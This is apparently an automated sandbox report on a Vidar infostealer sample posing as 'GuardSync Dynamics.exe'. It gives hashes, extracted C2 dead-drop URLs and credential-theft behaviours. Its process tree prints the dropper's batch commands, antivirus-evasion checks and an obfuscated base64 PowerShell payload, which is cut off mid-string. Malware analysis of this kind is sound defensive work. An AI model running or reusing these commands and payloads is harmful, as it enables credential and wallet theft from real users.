Analysis
-
max time kernel
288s -
max time network
210s -
platform
windows10-2004_x64 -
resource
win10v2004-20250619-en -
resource tags
arch:x64arch:x86image:win10v2004-20250619-enlocale:en-usos:windows10-2004-x64system -
submitted
04/07/2025, 11:56
Static task
static1
Behavioral task
behavioral1
Sample
04072025_1156_GuardSync Dynamics.exe
Resource
win10v2004-20250619-en
General
-
Target
04072025_1156_GuardSync Dynamics.exe
-
Size
3.0MB
-
MD5
96a3ecdd3e195998a31ebef46dd9aa94
-
SHA1
55063af085570e04530597917687a2d88af0df8e
-
SHA256
15d4376eb24c3a2090739087e51dd8c471520302948f33d7646218712e8ae1cb
-
SHA512
a110f85476947dbb07f3196f36d0dd4c341d84f5437877084ff57c6046c763a2fb4c9e29b64852a02a75e476a52b4f79b5e659d53ccc442020f433eb0609b888
-
SSDEEP
24576:X0apgm6NGZ3rwcJZCH8pqK7U+nhrVMSyDzz08Var0N:XR6e3rxZCH8p5l3MSyY8VF
Malware Config
Extracted
vidar
14.4
6ac1b1b70ccb3c5ee2891e7c48f811ac
https://t.me/q0l0o
https://steamcommunity.com/profiles/76561199872233764
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/137.0.0.0 Safari/537.36 OPR/122.0.0.0
Signatures
-
Detect Vidar Stealer 44 IoCs
resource yara_rule behavioral1/memory/4312-392-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-394-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-401-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-402-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-407-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-408-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-481-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-482-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-485-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-489-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-490-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-495-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-491-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-499-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-500-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-502-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-501-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-506-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-503-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-510-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-511-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-516-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-512-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-520-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-521-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-551-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-879-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-900-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-905-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-908-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-909-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-913-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-914-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-921-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-922-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-926-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-927-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-931-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-932-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-936-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-937-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-938-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-939-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 behavioral1/memory/4312-940-0x00000000007A0000-0x00000000007D9000-memory.dmp family_vidar_v7 -
Vidar family
-
Uses browser remote debugging 2 TTPs 3 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1488 msedge.exe 5608 msedge.exe 3032 msedge.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1567862796-3850854820-1319363977-1000\Control Panel\International\Geo\Nation 04072025_1156_GuardSync Dynamics.exe Key value queried \REGISTRY\USER\S-1-5-21-1567862796-3850854820-1319363977-1000\Control Panel\International\Geo\Nation Opens.com -
Executes dropped EXE 2 IoCs
pid Process 2844 Opens.com 4312 Opens.com -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3204 tasklist.exe 3372 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2844 set thread context of 4312 2844 Opens.com 108 -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\LooksMail 04072025_1156_GuardSync Dynamics.exe File opened for modification C:\Windows\AssembledRochester 04072025_1156_GuardSync Dynamics.exe File opened for modification C:\Windows\TwinsArc 04072025_1156_GuardSync Dynamics.exe File opened for modification C:\Windows\YesterdayArbitrary 04072025_1156_GuardSync Dynamics.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 04072025_1156_GuardSync Dynamics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Opens.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Opens.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Opens.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Opens.com Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 228 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133961039916338464" chrome.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 2844 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 2232 powershell.exe 2232 powershell.exe 4312 Opens.com 4312 Opens.com 2232 powershell.exe 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4404 chrome.exe 4404 chrome.exe 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 2232 powershell.exe 2232 powershell.exe 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com 4312 Opens.com -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 1488 msedge.exe 1488 msedge.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3204 tasklist.exe Token: SeDebugPrivilege 3372 tasklist.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeShutdownPrivilege 4404 chrome.exe Token: SeCreatePagefilePrivilege 4404 chrome.exe Token: SeShutdownPrivilege 4404 chrome.exe Token: SeCreatePagefilePrivilege 4404 chrome.exe Token: SeShutdownPrivilege 4404 chrome.exe Token: SeCreatePagefilePrivilege 4404 chrome.exe Token: SeShutdownPrivilege 4404 chrome.exe Token: SeCreatePagefilePrivilege 4404 chrome.exe Token: SeShutdownPrivilege 4404 chrome.exe Token: SeCreatePagefilePrivilege 4404 chrome.exe -
Suspicious use of FindShellTrayWindow 30 IoCs
pid Process 2844 Opens.com 2844 Opens.com 2844 Opens.com 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 4404 chrome.exe 1488 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2844 Opens.com 2844 Opens.com 2844 Opens.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1940 wrote to memory of 5612 1940 04072025_1156_GuardSync Dynamics.exe 89 PID 1940 wrote to memory of 5612 1940 04072025_1156_GuardSync Dynamics.exe 89 PID 1940 wrote to memory of 5612 1940 04072025_1156_GuardSync Dynamics.exe 89 PID 5612 wrote to memory of 3204 5612 cmd.exe 93 PID 5612 wrote to memory of 3204 5612 cmd.exe 93 PID 5612 wrote to memory of 3204 5612 cmd.exe 93 PID 5612 wrote to memory of 4808 5612 cmd.exe 94 PID 5612 wrote to memory of 4808 5612 cmd.exe 94 PID 5612 wrote to memory of 4808 5612 cmd.exe 94 PID 5612 wrote to memory of 3372 5612 cmd.exe 96 PID 5612 wrote to memory of 3372 5612 cmd.exe 96 PID 5612 wrote to memory of 3372 5612 cmd.exe 96 PID 5612 wrote to memory of 5360 5612 cmd.exe 97 PID 5612 wrote to memory of 5360 5612 cmd.exe 97 PID 5612 wrote to memory of 5360 5612 cmd.exe 97 PID 5612 wrote to memory of 3160 5612 cmd.exe 99 PID 5612 wrote to memory of 3160 5612 cmd.exe 99 PID 5612 wrote to memory of 3160 5612 cmd.exe 99 PID 5612 wrote to memory of 5344 5612 cmd.exe 100 PID 5612 wrote to memory of 5344 5612 cmd.exe 100 PID 5612 wrote to memory of 5344 5612 cmd.exe 100 PID 5612 wrote to memory of 2844 5612 cmd.exe 101 PID 5612 wrote to memory of 2844 5612 cmd.exe 101 PID 5612 wrote to memory of 2844 5612 cmd.exe 101 PID 5612 wrote to memory of 2300 5612 cmd.exe 102 PID 5612 wrote to memory of 2300 5612 cmd.exe 102 PID 5612 wrote to memory of 2300 5612 cmd.exe 102 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108 PID 2844 wrote to memory of 4312 2844 Opens.com 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\04072025_1156_GuardSync Dynamics.exe"C:\Users\Admin\AppData\Local\Temp\04072025_1156_GuardSync Dynamics.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy Chemical.accdt Chemical.accdt.bat & Chemical.accdt.bat2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5612 -
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"3⤵
- System Location Discovery: System Language Discovery
PID:4808
-
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\SysWOW64\findstr.exefindstr "nsWscSvc ekrn bdservicehost SophosHealth AvastUI AVGUI & if not errorlevel 1 Set uHaokukEYZtcNWeSFxjvzPhzyHypEx=AutoIt3.exe & Set sGlHEpDvlr=.a3x & Set ualNAJcOnaXFfMtgoBuyuxABXcS=3003⤵
- System Location Discovery: System Language Discovery
PID:5360
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y Greg.accdt *.*3⤵
- System Location Discovery: System Language Discovery
PID:3160
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Pac" Insurance3⤵
- System Location Discovery: System Language Discovery
PID:5344
-
-
C:\Users\Admin\AppData\Local\Temp\362997\Opens.comOpens.com E3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\362997\Opens.comC:\Users\Admin\AppData\Local\Temp\362997\Opens.com4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4312 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"5⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4404 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xf8,0xd4,0x7fff1ac1dcf8,0x7fff1ac1dd04,0x7fff1ac1dd106⤵PID:2120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=1976 /prefetch:26⤵PID:3668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1548,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=2256 /prefetch:36⤵PID:2328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=2536 /prefetch:86⤵PID:3048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=3176 /prefetch:16⤵PID:2540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=3200 /prefetch:16⤵PID:5428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4216,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=4232 /prefetch:26⤵PID:2676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=4644 /prefetch:16⤵PID:1768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5224,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=5236 /prefetch:86⤵PID:3168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5412,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=5428 /prefetch:86⤵PID:4456
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JAB7ADAAeAAxAGEAMgBiADMAYwB9AD0AWwBTAHkAcwB0AGUAbQAuAFIAYQBuAGQAbwBtAF0AOgA6AG4AZQB3ACgAKQA7ACQAewAwAHgANABkADUAZQA2AGYAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwANgA4ACwAOQA3ACwAMQAxADYALAAxADAAMQApAC0AagBvAGkAbgAnACcAKQA6ADoAbgBlAHcAKAApADsAJAB7ADAAeAA3AGcAOABoADkAaQB9AD0AJABuAHUAbABsADsAJAB7ADAAeABqADAAawAxAGwAMgB9AD0AQAAoACkAOwAkAHsAMAB4AG0AMwBuADQAbwA1AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMQAxACwAOQA4ACwAOQA5ACwAOQA3ACwAMQAxADYALAAxADAANQAsADEAMQAxACwAMQAxADAAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AHAANgBxADcAcgA4AH0APQAxAC4ALgAxADAAfAAmACgAWwBjAGgAYQByAFsAXQBdACgANwAwACwAMQAxADEALAAxADEANAAsADYAOQAsADkANwAsADkAOQAsADEAMAA0ACwANAA1ACwANwA5ACwAOQA4ACwAMQAwADYALAAxADAAMQAsADkAOQAsADEAMQA2ACkALQBqAG8AaQBuACcAJwApAHsAJAB7ADAAeAAxAGEAMgBiADMAYwB9AC4ATgBlAHgAdAAoACkAfQA7ACQAewAwAHgAcwA5AHQAMAB1ADEAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwAOAAwACwAMQAxADQALAAxADEAMQAsADkAOQAsADEAMAAxACwAMQAxADUALAAxADEANQApAC0AagBvAGkAbgAnACcAKQB8ACYAKABbAGMAaABhAHIAWwBdAF0AKAA4ADMALAAxADAAMQAsADEAMAA4ACwAMQAwADEALAA5ADkALAAxADEANgAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApAC0AagBvAGkAbgAnACcAKQAtAEYAaQByAHMAdAAgADMAOwAkAHsAMAB4AHYAMgB3ADMAeAA0AH0APQBbAFMAeQBzAHQAZQBtAC4ARwBDAF0AOgA6AEcAZQB0AFQAbwB0AGEAbABNAGUAbQBvAHIAeQAoACQAZgBhAGwAcwBlACkAOwAkAHsAMAB4AHkANQB6ADYAYQA3AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMAA5ACwAMQAxADEALAAxADEANAAsADEAMAAxACwAMQAwADYALAAxADEANwAsADEAMQAwACwAMQAwADcAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AGIAOABjADkAZAAwAGUAMQB9AD0AQAB7AGYAYQBrAGUAPQAnAGQAYQB0AGEAJwA7AG0AbwByAGUAPQAnAHMAdAB1AGYAZgAnAH0AOwAkAGEAPQA0ADQAMAA0ADsAJABiAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwADgAMgA5ADkALgB0AG0AcAAnADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAbgBFAHcALQBvAEIAagBFAEMAVAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AQwBvAG0AUABSAEUAUwBzAEkATwBuAC4ARABFAGYAbABhAFQAZQBzAFQAUgBFAGEATQAoAFsAaQBPAC4AbQBlAE0ATwBSAHkAcwB0AFIARQBhAE0AXQBbAGMATwBuAHYARQByAHQAXQA6ADoAZgByAG8ATQBCAEEAUwBFADYANABzAHQAcgBpAG4ARwAoACcAcgBWAFgAZgBiADkAbwB3AEUASAA3AFAAWAArAEUAeABIAGgATABKAG8AQQB6AFEAZgBoAFIARgBLAGcAMwB0AFYAcQBuAFQATwBtAEIAYgBWADgAUwBEAFMAUQA0AFMAegBiAEUAagB4ADQARwB3AHcAdgA4ACsASgB6AEUAdABhAGIATwBwAFYAUABNAEQAdgBvAHQAOQA5ADkAMwBIAGQAeQBlAC8AUgBqADkAWABxADYAKwBMAFcAKwBxAHYAUAByAHcAegBtAG8AawBrAFEAawA3AEMAQwBKAEMARABQAG8ASgBzAEQAWQBrAEUAdwArAGYAbwB6AGsAQgBxAE4AYgAxAFUAQwBHAEIAUABMAGgAUgBuAFEARQBtAGMAZwBLACsAKwBtADUAVgA3AEwAZgBTAFEAMQBXAHAAUAB1AEMAUgAwAEQAQgA1AG4AZgBtAEwAcwAwAEQAbwBJAEsAYQBpAEEAZgBYAEMATABTAHQAUwAxAEQARwBQAGcAKwA2ADMASgBKAGwAYgBSACsAZQA4AFEARgBpAEUATABaAGMAZwBaAE8AbQAwAFkAYQBSAEsAeQBKAFIAcAB2AEUAZwBsAFIAL